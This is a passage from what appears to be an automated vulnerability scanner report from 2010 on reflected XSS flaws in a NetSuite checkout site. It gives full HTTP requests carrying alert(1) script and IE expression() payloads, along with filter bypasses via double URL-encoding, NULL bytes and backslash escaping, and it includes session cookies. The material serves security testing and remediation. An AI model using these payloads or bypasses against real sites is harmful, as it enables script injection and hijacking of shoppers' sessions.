X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 47193


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828d1205'style='x:expression(alert(1))'04ac6827f1e&sc=6&n=3'>
...[SNIP]...

2.8. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea1e0%2527a%253d%2527b%2527a4e19e91a04 was submitted in the REST URL parameter 5. This input was echoed as ea1e0'a='b'a4e19e91a04 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/center/nlvisitor.nl/c.1034828/n.3ea1e0%2527a%253d%2527b%2527a4e19e91a04/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112271019:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=929
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14012


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<a href='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828&n=3ea1e0'a='b'a4e19e91a04&sc=6' class='errortext'>
...[SNIP]...

2.9. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12983'><script>alert(1)</script>f4dd61d6b9f81a0d8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=12983'><script>alert(1)</script>f4dd61d6b9f81a0d8&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 1214680267:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 233

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="12983'><script>alert(1)</script>f4dd61d6b9f81a0d8"'>
<script>function OnBa
...[SNIP]...

2.10. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87277'><script>alert(1)</script>0d33e5361ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361ab&docookiecheck=T HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:21:44 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 668352325:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=638
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 298

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T87277'><script>alert(1)</script>0d33e5361ab"'>
...[SNIP]...

2.11. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the HTML document as plain text between tags. The payload f1799<script>alert(1)</script>85b0cbdcd5eeb48c1 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -704961802:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 345

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T872
...[SNIP]...
</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1"'>
...[SNIP]...

2.12. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /c.1034828/site/drop_down_menu/anylinkcssmenu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a32"%3b9a1fdcd0d7 was submitted in the REST URL parameter 1. This input was echoed as 67a32";9a1fdcd0d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /67a32"%3b9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=35&n=3&redirect_count=1&did_javascript_redirect=T
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:28:59 GMT
Server: Apache
Content-Length: 2691
Expires: Sun, 21 Nov 2010 07:15:59 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/67a32";9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js' not found");



2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7175f\'%3balert(1)//122e2e8962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7175f\\';alert(1)//122e2e8962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /citricle-ga/?7175f\'%3balert(1)//122e2e8962c=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:24 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 776630900:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2351


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=citricle-ga&7175f\\';alert(1)//122e2e8962c=1&7175f\\'%3balert(1)//122e2e8962c=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d377\' style=x:expression(alert(1)) caad02a7c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /citricle-ga/?5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 326838907:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAfN9aIpK; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAd5-aEcO; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2435


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=citricle-ga&5d377\' style=x:expression(alert(1)) caad02a7c27=1&5d377\'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1'>
...[SNIP]...

2.15. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /javascript/help.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49886"%3bd493f9d8869 was submitted in the REST URL parameter 1. This input was echoed as 49886";d493f9d8869 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript49886"%3bd493f9d8869/help.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.4.10.1290273104; NS_VER=2010.2.0; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:50:29 GMT
Server: Apache
Content-Length: 2672
Expires: Sun, 21 Nov 2010 07:15:29 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/javascript49886";d493f9d8869/help.js' not found");



2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9847a'style='x:expression(alert(1))'ba0bac45916 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=4&n=3
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 270

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=&submitter=Continue&%009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:28:55 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704998492:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49868


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?.9847a'style='x:expression(alert(1))'ba0bac45916=1&continueclicked=T&kReferralCode=&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&submitter=Continue&cktime=87993'>
...[SNIP]...

2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bc49'style='x:expression(alert(1))'02b68d32520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
